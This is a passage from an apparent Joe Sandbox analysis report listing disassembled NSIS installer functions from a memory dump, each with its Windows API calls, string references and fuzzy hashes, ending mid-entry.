Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8

Function 00404A7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
GetMessagePos.USER32 ref: 00404AA1
ScreenToClient.USER32(?,?), ref: 00404ABB
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3

Strings

f, xrefs: 00404ACF

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8

Function 004062E9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373

Strings

*?|<>/":, xrefs: 0040633B

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED

Function 00401767 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38

Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE

Function 00404970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
wsprintfW.USER32 ref: 00404A1A
SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

%u.%u%s%s, xrefs: 004049FB

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68

Function 004063BF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
wsprintfW.USER32 ref: 00406411
LoadLibraryW.KERNEL32(?), ref: 00406421

Strings

%s%S.dll, xrefs: 0040640B

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8

Function 0040237B Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D

Function 00405683 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
GetLastError.KERNEL32 ref: 004056DA
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
GetLastError.KERNEL32 ref: 004056F9

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C

Function 00405128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405157
CallWindowProcW.USER32(?,?,?,?), ref: 004051A8

Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177

Strings

, xrefs: 00405138

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69

Function 00405C59 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405C77
GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92

Strings

nsa, xrefs: 00405C66

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

Function 00405735 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
CloseHandle.KERNEL32(0040A300), ref: 0040576B

Strings

